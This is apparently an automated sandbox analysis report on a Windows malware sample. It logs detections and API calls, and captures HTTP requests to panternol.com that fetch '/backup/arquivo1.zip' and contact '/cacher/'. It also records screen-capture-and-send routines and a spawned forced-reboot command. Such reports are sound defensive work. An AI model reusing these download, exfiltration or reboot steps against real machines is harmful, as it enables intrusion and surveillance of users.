Windows Analysis Report
leg#U00edvel9931-009-140.08372236.exe

AV Detection

Source: leg#U00edvel9931-009-140.08372236.exe

ReversingLabs: Detection: 21%

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.4% probability

Cryptography

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018000D4B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,		6_2_000000018000D4B0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018000D4B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,		7_2_000000018000D4B0

Compliance

Source: leg#U00edvel9931-009-140.08372236.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb source: 8pIuMUYQX9q.exe, 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000006.00000000.2051733417.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145964148.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000000.2132584136.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, ClassicIE_64.exe.0.dr

Source:

Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb! source: 8pIuMUYQX9q.exe, 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000006.00000000.2051733417.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145964148.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000000.2132584136.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, ClassicIE_64.exe.0.dr

Spreading

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A528EDC FindFirstFileExW,		6_2_00007FFE1A528EDC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180055750 FindFirstFileExW,		6_2_0000000180055750
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180055750 FindFirstFileExW,		7_2_0000000180055750

Networking

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_0000000180013480 WSAStartup,GdiplusStartup,_Thrd_detach,Sleep,GetDesktopWindow,GetWindowRect,MagSetWindowSource,RedrawWindow,GdipCreateBitmapFromScan0,CLSIDFromString,CreateStreamOnHGlobal,GdipSaveImageToStream,GdipDisposeImage,send,send,closesocket,recv,closesocket,Sleep,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

6_2_0000000180013480

Source: global traffic	HTTP traffic detected: GET /backup/arquivo1.zip HTTP/1.1Host: panternol.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cacher/ HTTP/1.1Host: panternol.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip

Source: global traffic

DNS traffic detected: DNS query: panternol.com

Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: 8pIuMUYQX9q.exe, 00000006.00000002.4145409860.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000006.00000002.4146358786.0000000002220000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145308802.0000000001398000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145573879.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145788826.0000000180064000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: 8pIuMUYQX9q.exe, 00000006.00000002.4145409860.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000006.00000002.4146358786.0000000002220000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145308802.0000000001398000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145573879.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145788826.0000000180064000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll1.3.1rbr
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C00008A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://GODEBUGhttps://panterno1.1.1.1
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C00008A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://panterno1.1.1.1
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C0000A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://panternol.com/backup/arqR
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C0000A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://panternol.com/backup/arqREQUEST_METHODpanternol.comiphlpapi.dll
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C000090000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://panternol.com/backup/arquivo1.zip
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C000010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://panternol.com/cacher/
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C000010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://panternol.com/cacher/https://panternol.com/cacher/panternol.com
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_0000000180006010 GetDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,ReleaseDC,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,CreateStreamOnHGlobal,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToStream,DeleteObject,DeleteDC,ReleaseDC,DeleteObject,DeleteDC,ReleaseDC,GdipDisposeImage,

6_2_0000000180006010

System Summary

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe

Process created: C:\Windows\System32\shutdown.exe shutdown /r /t 30

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A7B4C		6_2_00007FF6B40A7B4C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A87A8		6_2_00007FF6B40A87A8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A4E08		6_2_00007FF6B40A4E08
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A1000		6_2_00007FF6B40A1000
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A5E54		6_2_00007FF6B40A5E54
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A3C74		6_2_00007FF6B40A3C74
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A530948		6_2_00007FFE1A530948
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A511800		6_2_00007FFE1A511800
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A513480		6_2_00007FFE1A513480
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A512DF0		6_2_00007FFE1A512DF0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A5302AC		6_2_00007FFE1A5302AC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A52CA60		6_2_00007FFE1A52CA60
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A521B00		6_2_00007FFE1A521B00
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A52B308		6_2_00007FFE1A52B308
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A523F10		6_2_00007FFE1A523F10
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A528EDC		6_2_00007FFE1A528EDC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A521FDC		6_2_00007FFE1A521FDC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A521470		6_2_00007FFE1A521470
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A52DCD8		6_2_00007FFE1A52DCD8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A52BDB4		6_2_00007FFE1A52BDB4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800170A0		6_2_00000001800170A0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180013480		6_2_0000000180013480
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018000E860		6_2_000000018000E860
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800059D0		6_2_00000001800059D0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180006010		6_2_0000000180006010
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018005C044		6_2_000000018005C044
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018002C050		6_2_000000018002C050
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018002C080		6_2_000000018002C080
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018004C16C		6_2_000000018004C16C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800231C0		6_2_00000001800231C0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800501D8		6_2_00000001800501D8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018005A204		6_2_000000018005A204
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180042204		6_2_0000000180042204
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018002F240		6_2_000000018002F240
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180040254		6_2_0000000180040254
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800502BC		6_2_00000001800502BC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800282E0		6_2_00000001800282E0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180006380		6_2_0000000180006380
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800243C0		6_2_00000001800243C0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800233F0		6_2_00000001800233F0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018000F430		6_2_000000018000F430
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018000D4B0		6_2_000000018000D4B0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800404D8		6_2_00000001800404D8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018004E52C		6_2_000000018004E52C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180055544		6_2_0000000180055544
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180050550		6_2_0000000180050550
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180022570		6_2_0000000180022570
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018004A594		6_2_000000018004A594
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800305D0		6_2_00000001800305D0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180034610		6_2_0000000180034610
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180024650		6_2_0000000180024650
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800456BC		6_2_00000001800456BC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180055750		6_2_0000000180055750
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018004B760		6_2_000000018004B760
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180046850		6_2_0000000180046850
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180024920		6_2_0000000180024920
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800569C8		6_2_00000001800569C8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180045A68		6_2_0000000180045A68
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180051B00		6_2_0000000180051B00
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180057BA8		6_2_0000000180057BA8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180023BF0		6_2_0000000180023BF0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180054C70		6_2_0000000180054C70
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018004CC9C		6_2_000000018004CC9C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018000FCA0		6_2_000000018000FCA0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180026CE0		6_2_0000000180026CE0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800569C8		6_2_00000001800569C8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018001AD30		6_2_000000018001AD30
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180046D5C		6_2_0000000180046D5C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018001DE80		6_2_000000018001DE80
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018002AE90		6_2_000000018002AE90
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018002CEC0		6_2_000000018002CEC0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180011EC0		6_2_0000000180011EC0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180058F58		6_2_0000000180058F58
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180006FB0		6_2_0000000180006FB0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180023FC0		6_2_0000000180023FC0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800170A0		7_2_00000001800170A0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180006010		7_2_0000000180006010
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018005C044		7_2_000000018005C044
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018002C050		7_2_000000018002C050
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018002C080		7_2_000000018002C080
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018004C16C		7_2_000000018004C16C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800231C0		7_2_00000001800231C0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800501D8		7_2_00000001800501D8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018005A204		7_2_000000018005A204
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180042204		7_2_0000000180042204
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018002F240		7_2_000000018002F240
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180040254		7_2_0000000180040254
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800502BC		7_2_00000001800502BC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800282E0		7_2_00000001800282E0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180006380		7_2_0000000180006380
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800243C0		7_2_00000001800243C0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800233F0		7_2_00000001800233F0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018000F430		7_2_000000018000F430
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180013480		7_2_0000000180013480
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018000D4B0		7_2_000000018000D4B0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800404D8		7_2_00000001800404D8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018004E52C		7_2_000000018004E52C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180055544		7_2_0000000180055544
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180050550		7_2_0000000180050550
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180022570		7_2_0000000180022570
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018004A594		7_2_000000018004A594
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800305D0		7_2_00000001800305D0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180034610		7_2_0000000180034610
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180024650		7_2_0000000180024650
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800456BC		7_2_00000001800456BC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180055750		7_2_0000000180055750
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018004B760		7_2_000000018004B760
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180046850		7_2_0000000180046850
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018000E860		7_2_000000018000E860
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180024920		7_2_0000000180024920
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800569C8		7_2_00000001800569C8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800059D0		7_2_00000001800059D0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180045A68		7_2_0000000180045A68
